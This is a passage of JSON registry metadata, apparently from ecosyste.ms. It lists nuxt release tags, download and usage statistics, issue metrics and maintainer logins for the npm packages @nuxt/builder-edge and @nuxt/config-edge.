aa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2026-02-13T18:02:57.623Z","dependent_packages_count":4,"downloads":17526,"downloads_period":"last-month","dependent_repos_count":424,"rankings":{"downloads":1.0949912395657246,"dependent_repos_count":0.8139738529674262,"dependent_packages_count":4.506936399663058,"stargazers_count":0.15564167441745766,"forks_count":0.5232519525968256,"docker_downloads_count":1.8105650152087687,"average":1.4842266890698765},"purl":"pkg:npm/%40nuxt/builder-edge","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/builder-edge","docker_dependents_count":1,"docker_downloads_count":8,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/builder-edge","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/builder-edge/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs","https://github.com/sponsors/nuxt"],"critical":null,"issue_metadata":{"last_synced_at":"2026-02-13T18:00:30.319Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786776.4495867769,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":588,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.496213224584911,"merged_pull_requests_count":5386,"bot_issues_count":12,"bot_pull_requests_count":2972,"past_year_issues_count":940,"past_year_pull_requests_count":1678,"past_year_avg_time_to_close_issue":711939.6998050682,"past_year_avg_time_to_close_pull_request":221172.79485238457,"past_year_issues_closed_count":513,"past_year_pull_requests_closed_count":1321,"past_year_pull_request_authors_count":141,"past_year_issue_authors_count":674,"past_year_avg_comments_per_issue":2.2457446808510637,"past_year_avg_comments_per_pull_request":3.4153754469606676,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":694,"past_year_merged_pull_requests_count":1175,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":321,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":66,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"BobbieGoede","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"cernymatej","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"DamianGlowala","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"wattanx","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"dargmuesli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fbuilder-edge/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fbuilder-edge/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fbuilder-edge/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fbuilder-edge/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fbuilder-edge/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fbuilder-edge/codemeta","maintainers":[{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-08-21T00:48:24.166Z","updated_at":"2023-08-21T00:48:24.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1096086,"name":"@nuxt/config-edge","ecosystem":"npm","description":null,"homepage":"https://github.com/nuxt/nuxt","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":1806,"first_release_published_at":"2018-10-27T20:30:59.889Z","latest_release_published_at":"2020-06-29T00:22:44.234Z","latest_release_number":"3.0.0-26556502.75dd90f2","last_synced_at":"2026-03-31T02:02:50.859Z","created_at":"2022-04-08T10:39:22.534Z","updated_at":"2026-03-31T02:02:50.859Z","registry_url":"https://www.npmjs.com/package/@nuxt/config-edge","install_command":"npm install @nuxt/config-edge","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"next":"3.0.0-26556502.75dd90f2","latest":"2.18.2-28661769.e265ef3"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue 